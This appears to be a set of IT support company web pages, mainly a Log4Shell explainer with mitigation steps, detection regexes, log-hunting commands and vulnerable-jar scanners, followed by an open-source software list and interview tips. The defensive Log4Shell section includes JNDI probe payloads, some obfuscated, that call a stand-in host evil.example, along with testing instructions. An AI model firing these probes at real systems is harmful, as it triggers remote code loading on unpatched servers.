Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business, not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours grows with you, so we work hand in hand with you to support your growth.

We develop relationships that make a positive difference in our customers' business.

We exhibit a strong will to win in the marketplace and in every aspect of our business.

Log4j / Log4Shell (CVE-2021-44228) RCE

Explaining #log4j for non-technical people, because the internet is burning down and y'all might want to know what's happening and why there's all this "${jndi:ldap" stuff out there.

Log4j is a popular logging library used in the Java programming language. A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.

It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (Firefox, Chrome, Edge...), when you made the request, what page you accessed... and more!

So, this log4j library is used in A LOT of Java software, and there are approximately 3 billion devices that run Java. Quick math: that's huge.

Log4j is present in web servers, your phones, possibly on your smart fridge and plenty of other places...

A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything. One of the things it does is look for patterns like ${something} and try to replace them with another piece of information. It is used to add context; for example, ${date} would be replaced by today's date. (I have no idea if this example works, it's just to keep it simple.)

So when there's a ${jndi: pattern, it will try to replace it.

Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet; we just have to tell it where to get the data from. This data can be malicious software.

Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j. This means that at this point hackers can make the targeted computer do (almost) whatever they want. This gets really bad because we don't need to know which computer to target.

Remember when I said the web server logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.

In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing it. So... yeah. #log4j

(The above simple explanation is by Emy | eq, @entropyquween_ on Twitter.)
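
To make the mechanism in that explanation concrete, here is an added example: my own simplified Python model of lookup substitution, not Log4j's code and not part of the quoted thread. The lookup names, the layout string and the evil.example host are constructed. It shows why an obfuscated probe such as ${${lower:J}ndi:...} still resolves to a JNDI request, and what the two interim mitigations discussed further down (formatMsgNoLookups and removing JndiLookup) actually change.

```python
import re
from typing import Callable, Dict, List, Tuple

# Simplified model of Log4j-style lookup substitution (not Log4j's own code).
# "${name:arg}" is replaced by whatever the handler registered under "name"
# returns. Lookup names, layout and the evil.example host are constructed.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with no ${ inside it


def make_lookups(outbound: List[str]) -> Dict[str, Callable[[str], str]]:
    """Lookup table. 'jndi' stands in for the JNDI lookup: a vulnerable
    logger would fetch and instantiate an object from the given URL; here
    we only record the URL it would have contacted."""
    def jndi(arg: str) -> str:
        outbound.append(arg)
        return "<object loaded from %s>" % arg
    return {"lower": str.lower, "upper": str.upper, "jndi": jndi}


def resolve(text: str, lookups: Dict[str, Callable[[str], str]], max_rounds: int = 10) -> str:
    """Resolve innermost ${...} first and repeat, so a nested lookup such as
    ${${lower:J}ndi:...} assembles a *new* lookup on the next round. This is
    why filtering the literal string '${jndi:' on the way in is not enough."""
    def sub(m):
        body = m.group(1)
        default = None
        if ":-" in body:                       # ${name:arg:-default} syntax
            body, default = body.split(":-", 1)
        name, _, arg = body.partition(":")
        if name in lookups:
            return lookups[name](arg)
        # unknown or empty lookup name: use the default if given, else leave as-is
        return m.group(0) if default is None else default
    for _ in range(max_rounds):
        new = INNERMOST.sub(sub, text)
        if new == text:
            return text
        text = new
    return text


def log_line(layout: str, message: str, lookups, msg_lookups: bool) -> str:
    """Render one log event. msg_lookups=True models Log4j 2.0-beta9..2.14
    defaults, where the message text itself is subject to substitution.
    msg_lookups=False models formatMsgNoLookups=true / 2.15+: only the
    layout is resolved and the message is inserted verbatim afterwards."""
    if msg_lookups:
        return resolve(layout.replace("%m", message), lookups)
    return resolve(layout, lookups).replace("%m", message)


def handle_request(user_agent: str, msg_lookups: bool, jndi_enabled: bool = True) -> Tuple[str, List[str]]:
    """A web server logging the User-Agent header. Returns the rendered log
    line and the list of URLs the logger reached out to while rendering it."""
    outbound: List[str] = []
    lookups = make_lookups(outbound)
    if not jndi_enabled:                  # models removing JndiLookup.class from the jar
        del lookups["jndi"]
    line = log_line("${upper:ua}: %m", user_agent, lookups, msg_lookups)
    return line, outbound


if __name__ == "__main__":
    payload = "${${lower:J}ndi:ldap://evil.example/a}"   # constructed, obfuscated probe
    for msg_lookups, jndi in [(True, True), (False, True), (True, False)]:
        line, out = handle_request(payload, msg_lookups, jndi)
        print(f"msgLookups={msg_lookups} jndi={jndi}: {line!r} outbound={out}")
```

With message lookups on, the innermost ${lower:J} is resolved first, the result is a brand-new ${jndi:...} pattern, and the logger reaches out to the attacker's host; with lookups off the header is written exactly as received, and with the jndi handler gone the pattern simply stays unresolved in the log.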

Log4Shell is big: companies with servers confirmed to be vulnerable include the likes of Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DiDi, JD, NetEase, and possibly thousands more.

Apache has released Log4j 2.15.0 to address the maximum-severity CVE-2021-44228 RCE vulnerability (this release was itself superseded; see below): https://t.co/PzSkXJUxEi

Workaround so far: upgrade log4j. If you cannot upgrade, the RCE can be mitigated by setting log4j2.formatMsgNoLookups to true (-Dlog4j2.formatMsgNoLookups=true on the JVM command line, or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) and restarting the JVM.

Note that this property only exists in log4j2 versions 2.10 and later. If an application bundles an older log4j-core, including a copy nested inside another .jar, .war or .ear archive (a shaded or "fat" jar), the property is silently ignored and the application stays exploitable, so you must inventory the bundled versions, not just the ones visible on the filesystem.

Mitigation summary from the Apache advisory: for releases >= 2.10, set the system property log4j2.formatMsgNoLookups to true; for releases from 2.0-beta9 to 2.10.0, remove the JndiLookup class from the classpath, e.g. zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Both are stop-gaps; upgrading is the real fix.



Issue found after the update

It was found that the fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This allows attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc or %MDC), to craft malicious input using a JNDI Lookup pattern, resulting in a denial of service (DoS). Log4j 2.15.0 only makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. The advisory was later revised: in some environments the same input also permits information leakage and remote code execution, which is why the CVE was re-scored as critical and why 2.15.0 must not be treated as a complete fix. Later 2.x releases fixed further issues, so upgrade to the current 2.x release rather than pinning to 2.16.0.


https://www.cve.org/CVERecord?id=CVE-2021-45046
 


And another issue discovered: Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.

The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.

More Details Here:
https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html

Detection:

A. Test and detect vulnerable applications: the Huntress Log4Shell tester by John Hammond

https://log4shell.huntress.com/

The explain-like-I'm-five breakdown is that you simply copy and paste the generated JNDI syntax into anything (typically form fields, application input boxes, logins, anything) and check whether it received a connection. NO code is run, other than the connection made to test.


B. How to test your apps for the #log4shell vulnerability

1. Generate a DNS token: https://t.co/vCzVG0O03i

2. Wrap that token in the prefix ${jndi:ldap:// and the suffix /a}, giving ${jndi:ldap://<token>/a}

3. Use that value in search forms, profile data, settings etc. of your apps

4. Get notified when you have triggered a reaction: https://t.co/1w6jmF9qgy


C. I know that using regex is dumb and shit, but it's just first-line defense. This one is capable of detecting obfuscated payloads and should produce very few false positives:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:(ldap|rm)]('|"|`)*}*){9,10}


D. If you are looking for vulnerable software on Linux hosts, Docker containers or Kubernetes pods, the following commands may help. Run them from the directory you want to scan: the first lists jars that contain the JndiLookup class, the second lists jars that bundle a copy of log4j-core 2.x inside them (shaded/fat jars).

find . -name '*.jar' -exec sh -c 'unzip -l "$1" | grep -i --color=always JndiLookup.class' _ {} \; -print

find . -name '*.jar' -exec sh -c 'unzip -l "$1" | grep -i --color=always "log4j-core-2.*\.jar"' _ {} \; -print
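
The one-liners above stop at one level of nesting and do not tell you which workaround applies. As an added example (mine, not from the page) that serves both the mitigation notes earlier (which version needs formatMsgNoLookups and which needs the class removed) and the inventory commands in D, here is a scanner that descends into jars nested inside jars and reads the bundled log4j-core version from its Maven metadata. The archives built by build_jar() are constructed fixtures with placeholder bytes, not real class files.

```python
import io
import sys
import zipfile
from pathlib import Path
from typing import Dict, Iterator, List, Optional, Tuple

# Added example (mine, not from the page). Sample archives are constructed.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

ADVICE = {
    "PATCHED": "2.16.0 or later: JNDI off and message lookups removed; still track later 2.x fixes",
    "INCOMPLETE_FIX_UPGRADE": "2.15.0: fix incomplete (CVE-2021-45046), upgrade",
    "VULNERABLE_SET_NO_LOOKUPS": ">=2.10: upgrade; until then -Dlog4j2.formatMsgNoLookups=true and restart",
    "VULNERABLE_REMOVE_CLASS": "<2.10: upgrade; until then delete JndiLookup.class from the jar",
    "CLASS_REMOVED": "JndiLookup.class already stripped from this copy",
    "UNKNOWN_VERSION": "JndiLookup.class present but no version metadata: inspect by hand",
}


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0) (pre-release tags dropped)."""
    parts = []
    for piece in version.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def classify(version: Optional[str], has_jndi: bool) -> str:
    if version is None:
        return "UNKNOWN_VERSION" if has_jndi else "NO_FINDING"
    v = parse_version(version)
    if v >= (2, 16):
        return "PATCHED"
    if not has_jndi:
        return "CLASS_REMOVED"
    if v[:2] == (2, 15):
        return "INCOMPLETE_FIX_UPGRADE"
    if v >= (2, 10):
        return "VULNERABLE_SET_NO_LOOKUPS"
    return "VULNERABLE_REMOVE_CLASS"


def scan_archive(data: bytes, name: str) -> Iterator[Tuple[str, Optional[str], bool]]:
    """Yield (path, bundled log4j-core version or None, JndiLookup present)
    for this archive and, recursively, every archive nested inside it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        present = set(names)
        version = None
        if POM_PROPS in present:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is not None or JNDI_CLASS in present:
            yield name, version, JNDI_CLASS in present
        for inner in names:
            if inner.lower().endswith(ARCHIVE_SUFFIXES):
                yield from scan_archive(zf.read(inner), f"{name}!/{inner}")


def scan_tree(root: str) -> List[Tuple[str, Optional[str], str]]:
    """Walk a directory tree (a container image export, a pod filesystem, ...)."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                for where, version, has_jndi in scan_archive(path.read_bytes(), str(path)):
                    findings.append((where, version, classify(version, has_jndi)))
            except zipfile.BadZipFile:
                continue
    return findings


def build_jar(version: Optional[str], include_jndi: bool = True,
              nested: Optional[Dict[str, bytes]] = None) -> bytes:
    """Constructed fixture: a minimal zip shaped like a log4j-core or app jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if version is not None:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not a real class
        for inner_name, inner_bytes in (nested or {}).items():
            zf.writestr(inner_name, inner_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:   # no path given: demonstrate on a constructed fat jar with an old nested log4j-core
        app = build_jar(None, include_jndi=False,
                        nested={"BOOT-INF/lib/log4j-core-2.14.1.jar": build_jar("2.14.1")})
        results = [(w, v, classify(v, j)) for w, v, j in scan_archive(app, "app.jar")]
    for where, version, status in results:
        print(f"{status:26} {version or '?':10} {where}  -> {ADVICE.get(status, '')}")
```

Run it with a directory argument (a mounted container layer, an unpacked image, /opt on a host) to get one line per bundled copy; a jar reported as VULNERABLE_REMOVE_CLASS is exactly the case where the environment variable in section E does nothing.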

E. A quick and dirty way by Jai Minton (more of his work at https://www.jaiminton.com/):

To find jar files that contain a JndiLookup.class in PowerShell (change the drive letter as needed):

gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path

Running the following in PowerShell as Administrator on Windows sets the machine-wide environment variable that mitigates the issue for Log4j instances >= 2.10. Java processes must be restarted to pick it up, and it does nothing for bundled copies older than 2.10:

[Environment]::SetEnvironmentVariable("LOG4J_FORMAT_MSG_NO_LOOKUPS","true","Machine")


For forensic examiners, it is not known how practical exploitation is, but both Cellebrite BlackLight and Autopsy use components that bundle the vulnerable log4j class: Elasticsearch in BlackLight (possibly Inspector as well), and Apache Solr for Autopsy keyword searching.


F. You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228 (they come from the Neo23x0 gist linked under Other info below)

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

Grep / Zgrep - Obfuscated Variants

These commands also cover the obfuscated variants (the sed/tr pipeline strips ${lower: wrappers and closing braces before matching), but the match does not show the file name.

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'"  \;
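
The regex in C needs a PCRE-capable grep (grep -P) because of the (?1) subroutine call, and the sed/tr pipelines above only undo the ${lower:...} wrapper. As an added example (mine, not from the page) serving both C and F, here is the same detection logic in Python, run over constructed access-log lines: it undoes URL encoding, ${lower:}/${upper:} wrappers and the ${...:-x} default-value trick repeatedly before matching, and extracts the callback target for blocklisting. The scheme list and the sample lines are my own choices.

```python
import re
from urllib.parse import unquote
from typing import List, Tuple

# Added example (mine, not from the page). Sample log lines are constructed.
# Obfuscation layers seen in real probes: ${lower:x}/${upper:x} wrappers and the
# default-value form ${anything:-x}, which evaluates to x when the lookup name is
# empty or unknown (e.g. ${::-j}, ${env:NOPE:-j}). Undone innermost-first and
# repeatedly, the same idea as the sed/tr pipelines above.
CASE_WRAP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Schemes JNDI can dispatch to (list chosen here); ldap/rmi/dns match the greps above.
JNDI_PROBE = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis|http)://?([^}\s\"]+)", re.IGNORECASE)

SAMPLE_LOG = [
    '10.0.0.1 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:ldap://evil.example:1389/a}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}${upper:n}di:${lower:rmi}://evil.example/x}"',
    '10.0.0.4 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 12 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://evil.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/${lower:HELLO} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def normalize(line: str, max_rounds: int = 20) -> str:
    """Peel URL encoding and lookup wrappers until the text stops changing."""
    text = line
    for _ in range(max_rounds):
        new = unquote(text)
        new = CASE_WRAP.sub(lambda m: m.group(1), new)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines) -> List[Tuple[int, str, str]]:
    """Return (line number, scheme, target) for every line carrying a JNDI probe."""
    hits = []
    for number, raw in enumerate(lines, 1):
        m = JNDI_PROBE.search(normalize(raw))
        if m:
            hits.append((number, m.group(1).lower(), m.group(2)))
    return hits


def scan_file(path: str) -> List[Tuple[int, str, str]]:
    """Same check over a real (uncompressed) log file; for .gz use gzip.open."""
    with open(path, errors="replace") as fh:
        return scan_lines(fh)


if __name__ == "__main__":
    for number, scheme, target in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {scheme} probe -> {target}")
```

Only the probe lines are flagged; the benign ${lower:HELLO} on line 6 is unwrapped but never becomes a jndi pattern, which is what keeps false positives low.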

Guidance from Microsoft: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

Microsoft Sentinel hunting query: Possible exploitation of Apache log4j component detected

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml

This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache.  Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.

Cryptocurrency miners EXECVE : This query hunts through EXECVE Syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded.  It returns a table of suspicious command lines.

Microsoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability:  https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell


Curated Intel: IOCs and reports https://github.com/curated-intel/Log4Shell-IOCs

https://crowdsec.net/log4j-tracker/

Other info:




This repo lists a good few high-traffic sites that were vulnerable to CVE-2021-44228: https://github.com/YfryTchsGD/Log4jAttackSurface

Commands and rules for searching for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228 (the source of the grep commands in section F): https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

PoC:  https://t.co/yShp4iRTxJ

Patch:  https://t.co/rVSq2EZfoT

Technical breakdown:  https://t.co/QWRkh6rk4y

Crowdstrike blog https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/

 And more

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217


https://gist.github.com/yt0ng/8a87f4328c8c6cde327406ef11e68726


https://urlhaus.abuse.ch/browse/tag/log4j/


Fortinet  detection solution https://community.fortinet.com/t5/FortiAnalyzer/Technical-Tip-Using-FortiAnalyzer-to-detect-activities-related/ta-p/201026


TryHackMe room for practice: https://tryhackme.com/room/solar


Happy Hunting.



Best Free Open Source Software of 2022 for your Home or Small Business

The term open source refers to software whose source code is published under a license that lets anyone download, inspect, modify, use and share it, and that's why we love it.

You will find open source versions of almost every kind of software imaginable, from operating systems and office suites to media, accounting and productivity tools. With that in mind, here is our pick of the very best open source software.

Operating System: Linux

Let's start with the first thing you need: an operating system for your PC or laptop. In the past 10 years the gap between the features of the major operating systems has become smaller and smaller, and Linux isn't just for geeks and nerds. Anyone can install Linux and use it for everyday computing: browsing the web, watching Netflix, typing letters, sorting home finances, video and photo editing, and managing music collections. There are plenty of distributions to choose from, and everyone from novices to system administrators, hackers and security professionals can find one that suits them.

Ubuntu: One of the most popular distros for good reason, Ubuntu is an open-source software operating system that runs from the desktop, to the cloud, to all your internet connected things.

Ubuntu is officially released in three editions: Desktop, Server, and Core (for internet of things devices and robots). Ubuntu is a popular operating system for cloud computing. It is released every six months, with long-term support (LTS) releases every two years. Download it from the official Ubuntu site.

 

Linux Mint is a great ‘default’ distro for new Linux users, as it comes with a lot of the software you’ll need when switching from Mac or Windows, such as LibreOffice, the favored productivity suite of Linux users. It also has better support for proprietary media formats, allowing you to play videos, DVDs, and MP3 music files out of the box. Why not give it a go today.  


Office software: LibreOffice

Next you need a productivity suite, and here LibreOffice comes to the rescue. LibreOffice is a powerful office suite: its clean interface and feature-rich tools help you unleash your creativity and enhance your productivity. It is a full suite of workplace software, with excellent apps for text documents, spreadsheets, presentations and databases, and it can open and save the current Microsoft file formats, so you will have little trouble sharing files with users of Word, Excel, PowerPoint and Access.

LibreOffice includes several applications that make it the most powerful free and open source office suite on the market. You can download it from the official LibreOffice site.

 

Email client: Mozilla Thunderbird

Email is a key part of everyday life. Thunderbird is a free and open source email, news feed, chat and calendaring client that's easy to set up and customize. One of the core principles of Thunderbird is the use and promotion of open standards, a rejection of a world of closed platforms and services that can't communicate with each other: users should have freedom and choice in how they communicate. You can download it from the official Thunderbird site.


Web browser: Mozilla Firefox

Firefox is a free web browser created by a global non-profit dedicated to putting individuals in control online. It is available for Microsoft Windows, macOS, Linux, BSD, illumos and Solaris, and its sibling, Firefox for Android, is also available. You can download it from the official Mozilla site, including builds in your own language.

 

Accounting / Small Business Accounting: GnuCash

GnuCash is personal and small-business financial-accounting software, freely licensed under the GNU GPL and available for GNU/Linux, BSD, Solaris, Mac OS X, and Microsoft Windows. Designed to be easy to use, yet powerful and flexible, GnuCash allows you to track bank accounts, stocks, income, and expenses. As quick and intuitive to use as a checkbook register, it is based on professional accounting principles to ensure balanced books and accurate reports. Download here

Clean Your System and Free Disk Space: BleachBit

When your computer is getting full, BleachBit quickly frees disk space. When your information is only your business, BleachBit guards your privacy. With BleachBit you can free cache, delete cookies, clear Internet history, shred temporary files, delete logs, and discard junk you didn't know was there. Designed for Linux and Windows systems, it wipes clean thousands of applications including Firefox, Internet Explorer, Adobe Flash, Google Chrome, Opera, Safari, and more. Beyond simply deleting files, BleachBit includes advanced features such as shredding files to prevent recovery, wiping free disk space to hide traces of files deleted by other applications, and vacuuming Firefox to make it faster. Better than free, BleachBit is open source. Download link


Password manager: KeePass Password Safe

Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your website's FTP password, online passwords (like website member account), etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, website, etc. Unimaginable.

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish). Download link



Disk encryption: DiskCryptor

DiskCryptor is an open source encryption solution that offers encryption of all disk partitions, including the system partition. Like TrueCrypt, DiskCryptor can encrypt system drives and external devices such as CDs and thumb drives, and it supports several algorithms (AES, Twofish, Serpent) as well as cascades of them for extra margin. If you previously used TrueCrypt, DiskCryptor is one of the closest free options available; before relying on any disk-encryption tool, check that the release you install is still maintained, and test that you can recover your data from backups.

Media player: VLC Media Player

VLC media player (commonly known as VLC) is a free and open source, portable, cross-platform media player and streaming media server. VLC offers everything you could need from a media player: comprehensive format support, streaming, downloading and much more. Download it from the official VideoLAN site.

 

Photo editor: GIMP

GIMP is a cross-platform image editor available for GNU/Linux, OS X, Windows, and more operating systems. It is free software, you can change its source code and distribute your changes. Whether you are a graphic designer, photographer, illustrator, or scientist, GIMP provides you with sophisticated tools to get your job done. You can further enhance your productivity with GIMP thanks to many customization options and 3rd party plugins.Download Link

Video editor: Shotcut

Shotcut is a free, open source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required, meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support up to 4K. More features and the download link are on the Shotcut site.

Audio editor: Audacity

Free, open-source, cross-platform audio software. Audacity is an easy-to-use, multi-track audio editor and recorder for Windows, Mac OS X, GNU/Linux  Download Here


What did we miss?

Is there an open source application we missed? These are just a few of the best open source and free programs I use personally. They offer terrific value, and because their source code is open, anyone can inspect what they do with your data, which is a real advantage for privacy in this digital age (open source is not automatically secure, though: keep these tools updated like any other software).

We think of this as a work in progress, so if you believe there is software that should be added to this list, please let us know in the comments section below.

If you like this post, feel free to share it, and if you want to connect with me, add me on LinkedIn: Faysal Hasan https://au.linkedin.com/in/faysalhasan

Interview Tips, Preparation and Behavioral/Competency Based Interviews


 Interview Tips


Congratulations on securing an interview!

This is your opportunity to demonstrate your personal attributes, your strengths, personality, your ability to communicate and how you react under pressure.  Here are some tips to assist you in selling your assets:

Develop Rapport

To ensure effective communication, it is very important to develop a good rapport with the person interviewing you.  Of course, this is sometimes difficult, particularly if you “really want the job”.  However, you must relax – get that high-pitched or tense tone out of your voice – and appear to be calm and self-assured at all times.

One of the simplest ways of helping this is to smile a lot.  Yes, when appropriate, smile.  Not a grin but a genuine, warm smile.  Ask yourself seriously: do you smile during the course of conversation?

Ask Good Questions

This is a big tip!  Don't just tell the interviewer how wonderful you are and how good your achievements have been.  Demonstrate that you have done your homework, that you are really listening and that you understand what's going on.  You can do this by asking relevant questions about the department and the job in question.  Taking an interest in the big picture will have a positive influence on the interviewer.  If, in the limited time of an interview, you can ask one or two questions that actually make the interviewer think about the answer, or better still, cover issues they hadn't even thought of, then you really are on the home stretch.


Preparation Will Make or Break the Interview!


Preparation is the first essential step towards a successful interview. 

Be prepared to answer a couple of standard questions such as:

•  What do you want to be doing in your career five years from now?  Ten years from now?
•  What style of management gets the best from you?  Who was your best boss?  Why?
•  What have you learnt from some of the jobs you have held?  What did you enjoy the most?  What did you enjoy the least?
•  What have you done that shows initiative in your career?
•  What are you looking for in your next role?

“Open probe” questions are different because they strike right at the heart of issues and require more than a yes/no answer.

•  Why do you want to change roles?
   Give a positive answer: confident, coherent and logical explanations are critical to the interview process.

•  What is your greatest strength/weakness?
   Have some answers ready; even weaknesses can be presented positively, especially if you are doing something about them.

•  Why should you be successful in gaining this role?
   Here's a chance to review your strengths and show how you can make a big contribution.  Sell your benefits, not your features.

•  How do you react to criticism?


Behavioral/Competency Based Interviews


Behavioral interviewing is based on the premise that past behavior is the best indicator of future behavior.  With a set of competencies identified beforehand, the interviewer will ask you to relate specific examples or situations where you have demonstrated a particular competency in the past.

For example, let’s say problem solving is a competency required for the role.  The interviewer may ask something like:

“Tell me about a time where you have solved a business problem?  What was the situation?  What was the outcome?”

The best way to answer these questions is to describe a specific example that demonstrates your ability in that area using the “STAR” technique to structure your response:

S – Situation
T – Task
A – Action
R – Result

So in answering the above question, an appropriate response may go something like this:

“The situation at XYZ Company when I first joined was that all employees had authority to speak to the media.  This created problems such as inconsistent message, inaccurate/untimely information release and an array of other undesirable consequences for the company’s image.  My task as Media & PR Manager was to build and maintain a positive corporate image so the action I took was to immediately implement a policy whereby only four nominated executives had authority to deal with the media and that all media and PR activity initiated outside my team was to be signed off by me.  I took the time to gain the buy-in of management and then all employees so that everyone was happy to adhere to the new policies.  The result was great – no more embarrassing situations and a far more positive attitude to our brand as evidenced by a recent independent survey”.

This answer clearly demonstrates the candidate’s ability to decisively and collaboratively solve a business problem.  The answer is also very succinct which means the interviewer is more likely to tune in to the entire response.  The interviewer can then drill down further to obtain more detail around the “how’s” and “why’s” of the example.

Great answers to interview questions are:

•  Relevant
•  Succinct
•  Able to show clearly what you did and how you did it
•  Delivered with an appropriate level of energy and enthusiasm
•  Not "waffly"!

Closing the Interview


You have come to the end of the interview.  Don’t make the mistake and nervously mumble “Thank You” and leave.  Always be prepared to ask questions at the end of the interview – have at least one question that indicates you’ve been listening.  Of course, this is also a good opportunity to let the interviewer know that you are terribly keen on the job.  Don’t worry about appearing too eager – as long as you’re being yourself.  The interviewer is looking for an enthusiastic person, not someone who hasn’t decided if this is the right career for them.

If you have answered the two questions uppermost in the interviewer’s mind – “Why are you interested in the job?” and “What can you offer and can you do the job?” – You have done all you can.


Good luck – and enjoy!

Cyber Security Interview questions

Q1) Define cybersecurity.

Ans. Cybersecurity is the protection of internet-connected systems (hardware, software and the data they hold) from attack, damage and unauthorized access. In a computing context it is often summarised as protection against unauthorized access, but it equally covers keeping data correct (integrity) and systems reachable (availability).

Q2) What is cryptography?

Ans. Cryptography is the practice of protecting information by transforming it so that only parties holding the right key can read it (encryption) or verify that it is genuine and unmodified (hashing, MACs and digital signatures). It lets confidential data be stored or transmitted over channels that third parties can see without giving them access to its content.

Q3) What is the difference between threat, vulnerability and risk?

Ans. •Threat: anything (a person, a piece of malware, an event) with the potential to cause harm to a system or organization, for example by stealing, damaging or destroying data.

Ex: a phishing campaign

•Vulnerability: a weakness in a system that a threat can take advantage of, making a harmful outcome more likely or more severe.

Ex: SQL injection, cross-site scripting

